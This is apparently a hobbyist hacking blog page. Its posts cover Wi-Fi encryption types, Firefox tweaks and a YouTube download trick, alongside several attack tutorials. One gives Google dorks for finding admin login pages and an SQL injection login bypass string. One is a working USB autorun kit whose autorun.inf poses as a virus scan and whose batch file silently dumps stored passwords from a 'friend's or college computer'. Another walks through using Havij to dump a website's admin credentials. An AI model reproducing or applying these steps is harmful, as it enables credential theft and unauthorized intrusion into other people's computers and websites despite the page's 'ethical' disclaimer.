Showing posts with label hackinvasion. Show all posts
Showing posts with label hackinvasion. Show all posts

Wireless Hacking

What is Wireless?



Wireless communication is the transfer of information or power between two or more points that are not connected by an electrical conductor.

The most common wireless technologies use radio. With radio waves distances can be short, such as a few meters for television or as far as thousands or even millions of kilometers for deep-space radio communications. It encompasses various types of fixed, mobile, and portable applications, including two-way radios, cellular telephones, personal digital assistants (PDAs), and wireless networking. Other examples of applications of radio wireless technology include GPS units, garage door openers, wireless computer mice,keyboards and headsets, headphones, radio receivers, satellite television, broadcast television and cordless telephones

Wireless Hacking 



An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.


Now to hack a Wifi Password you must first know what type of encryption it uses for its passwords there are many different types such as: WEP (easiest to crack/hack), WPA and WPA2.


Types Of Encyption 

- WEP
- WPA
- WPA2

WEP

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.

WPA


The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.

The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode with strong security. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark
==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x

LETS START WIFI HACKING

(to be continued............)




Hack a Website in 3 simple steps.

               WEBSITE HACKING IN 3 SIMPLE STEPS

                               

STEP 1: search for an google hacking dork. A dork is passage through which an attacker can gain access to a website.There are many many google hacking dorks I will just take one.For more dorks just search"google hacking dorks". This will help you get many websites.
 DORK example:
inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx
I will be using this one:-Inurl:adminlogin "city"


STEP 2: Click on any site which is listed. An admin login page will appear on the screen.
NOTE: if the site has protection then this method will not work.
for eg:


STEP 3: After we get the login page the only process left is the authentication process. A user name and a password is to be filled which only the admin knows. So for this we will use SQL injection.
Just fill Username : admin
passowrd: 'or''='
(This is the basic combination)
NOTE: there are many combinations of SQL, if this combonation doesnt work try another one there are many.
After filling the username and password you now gain access to the website.

(this is the dashboard of the website)

This is an educational tutorial. I donnot take responsibility for any damage caused.I hope this tutorial will help you in many ways. Always be an Ethical Hacker.
HAPPY HACKING


Increase Firefox Browsing Speed

How to make Mozilla Firefox 30 times faster






1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it
recieves.


If you're using a broadband connection you'll load pages 2-30 times faster now.

Download video without using IDM or youtube downloader

DOWNLOAD YOUTUBE VIDEOS
WITHOUS ANY SOFTWARES LIKE
IDM / YTD  (SIMPLEST WAY)


* First goto youtube and play the
video you want download.
"GANGNAM STYLE video"
( www . youtube . com/watch?
v=9bZkp7q19f0)

* now to download just replace "
www. with "ss" and hit enter, it
will redirect you to page where
you get download options with
options 360p, 480p 720 p
1080p .



now the URL will be
(ssyoutube.com/watch?
v=9bZkp7q19f0)

How to hack passwords using USB Drive

How to hack passwords using USB Drive:

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.

We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.

2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

Hacking website with Havij

Introduction:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.

Preparation :

  • Download Free edition from Havij (In the same page, you can see the difference between free and professional edition). It is matter of what your target is.
  • Now you google with below options to find websites  vulnerable for targetting SQL Injection with Havij
                 inurl:index.php?id=
                 inurl:article.php?id=


Once you choose a website, type ‘ at the end like shown below and press enter. If you get an error, then the website is vulnerable to SQL Injection.
http://www.hackinvasion/site/content.php?vn=3&id=77′
1. Retrieve DB Information:
Copy and paste the target url in ‘Target’ column and click ‘Analyze’


                          


Once Havij is successful in retrieving DB name, it will stop and you can see the database details either at the log window or ‘Info’ option. Havij will retrieve Web Server Type (Apache, IIS or other), DB Type (My SQL, MS SQL or other) and DB Name
Once this is successful, you can make sure that you are in right path i.e; your target is vulnerable to SQL Injection Attack

2. Retrieve Tables:
Now you need to retrieve all table that contains user name and password to login to the website. Choose the db and Click ‘Get Tables’ option.


                                


Here you go, now all the tables are retrieved from DB. You can either wait till it retrieves all the tables or you can just stop the top when you see any suspected table like one below. I stopped the processing when Havij found a table that I suspected to be containing user names and passwords for the website.
                                   


3. Retrieve Table Columns:
Before you start retrieving data of a specific table, you need to get the columns. So mark the suspected password table and click ‘Get Columns’ 


I am really sorry for marking all website specific details with red mark, I must do that to safeguard.
 

4. Retrieve User name and Password:
You are at final stage of hacking . Mark the database, table and columns to be retrieved and you have option of retrieving only one row. Choose ‘Get Data’  to let Havij give you member access to the site.


I am done now, luckily my target website didn’t store passwords encrypted and I have their website’s admin password. That’s it!
 If the password is encrypted, Havij has inbuilt MD5 option where you can specify the MD5 hash to be cracked.  Havij will look for hash in several sites in mul thread mode and displays the result.

Thanks to :www.hackandsecure.com

Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.